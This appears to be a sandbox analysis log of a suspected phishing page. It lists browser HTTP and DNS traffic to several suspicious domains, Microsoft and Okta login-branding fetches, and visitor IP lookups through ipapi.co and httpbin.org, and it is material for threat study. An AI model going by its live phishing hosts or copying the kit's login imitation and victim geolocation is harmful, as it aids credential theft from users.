XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://vkwek.ckyucle.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40 HTTP/1.1Host: s3irk.ativens.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBVclJaQVlFbDN1TFJWVVNEMVk0eGc9PSIsInZhbHVlIjoiZStZajJPUkRoMld0SCtsck5VQU12ZUlSQmxjWGtpMW1qNDdzSXZRbDJRYU5mekpVK1BWcnY5amxJcnQrQzErMzZKK2pBR2FiaFI3ekhyOUlISDQxSGM3UlI2a1o1ckxPYks5dG9mTjZoQ3MzQ1p4U3MzZ0ZBTXI2T3JSOEhvZ2ciLCJtYWMiOiI3NDQ4MjRlNWQ5NjY3MGQwMTA1Y2NhYWY0NGQxMGYyODdlYzk4MWI0OTg3NWI2OGJlYjFmMjA3MzViNGE4YzM2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJhdlh1anpmNWN2eTFaVXJXYjJvVWc9PSIsInZhbHVlIjoiNktDUnJKQWY1emd4YXFWSDdyMlNzNnQ1YytGa2pkZXM4V0ZWd0lrdzZoa3pmWWFRVUZSMlFVeXBjKytIcXR2MHZoY0drK29relBRNFNKWVY4QThZenNhb2FwdXJwMlJxUzlaaFVkUmlCcGNWbC9tcnlOajVydHM4S0JJQkk5ZFkiLCJtYWMiOiJjNmVlNTk0NGEzMTY4OWRlNWQyYWJmMDg4MmQwZGY5M2EzNWU2NmU1OWMxOTExZjQ0NzhiNmZmODE5OWY0ZjgxIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: www.itanhangasaude.com.br
        Source: global trafficDNS traffic detected: DNS query: vkwek.ckyucle.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: nzd92.6gniu68.ru
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
        Source: global trafficDNS traffic detected: DNS query: github.com
        Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
        Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
        Source: global trafficDNS traffic detected: DNS query: httpbin.org
        Source: global trafficDNS traffic detected: DNS query: ipapi.co
        Source: global trafficDNS traffic detected: DNS query: s3irk.ativens.com
        Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
        Source: unknownHTTP traffic detected: POST /report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 428Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 1348Server: cloudflareCF-RAY: 89d53a5f9edd8c23-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:40 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 2QCk5lnmg/Vz5+Leh/mNbA==$wGqH3Wj9xaw/mcXiawA9wA==Server: cloudflareCF-RAY: 89d53a8feab28c47-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:40:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: dz1z/F5Y/H+JvFOJLnjQBg==$4H114BBoHY4JTvNfzKIetg==Server: cloudflareCF-RAY: 89d53aab4c9e728a-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: bnqcWyO0I0VHDQ3UvW45pA==$c7sV2ixOd2+Gu37NSWq2EQ==Server: cloudflareCF-RAY: 89d53b16392d0f39-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2XypR95Qs7VWdniFUiARnjZ44B9gUvUfBVwLe4MpOYwxw4ib2rjoDCKiWeXOu8bdIEFyOxSpEu4wlwqHJFE6jmg3VyGvkB0%2FYfJuE9w7IHxEVE5Ayhduj9KpAsk5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b1cc895428e-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNr7K31YxCybawgO8UcrvC9KOG8x01hj10z4d6VsyJz8tdqSzuEzr2ucdsLTt4o9vVVqnxpyXDz3viB292rO%2Bl2gk1mmsmQNNxMEte%2FgZ9AQMb3D4NGU2dlpMIR%2FQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b3eafe68c36-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:12 GMTContent-Type: application/json; charset=utf-8Content-Length: 155Connection: closevary: OriginCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d53b593c4fc411-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 07:41:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d53b5f5a3843b8-EWR
        Source: chromecache_118.2.drString found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
        Source: chromecache_126.2.drString found in binary or memory: https://cloud.google.com/contact
        Source: chromecache_126.2.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
        Source: chromecache_126.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
        Source: chromecache_126.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
        Source: chromecache_126.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
        Source: chromecache_118.2.drString found in binary or memory: https://github.com/fent)
        Source: chromecache_126.2.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
        Source: chromecache_126.2.drString found in binary or memory: https://recaptcha.net
        Source: chromecache_126.2.drString found in binary or memory: https://support.google.com/recaptcha
        Source: chromecache_126.2.drString found in binary or memory: https://support.google.com/recaptcha#6262736
        Source: chromecache_126.2.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
        Source: chromecache_126.2.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
        Source: chromecache_123.2.drString found in binary or memory: https://vkwek.ckyucle.com/2DUx/#-
        Source: chromecache_126.2.drString found in binary or memory: https://www.apache.org/licenses/
        Source: chromecache_126.2.dr, chromecache_121.2.drString found in binary or memory: https://www.google.com/recaptcha/api2/
        Source: chromecache_126.2.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.
        Source: chromecache_121.2.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 62974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 62922 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62945 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62951 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62953
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62954
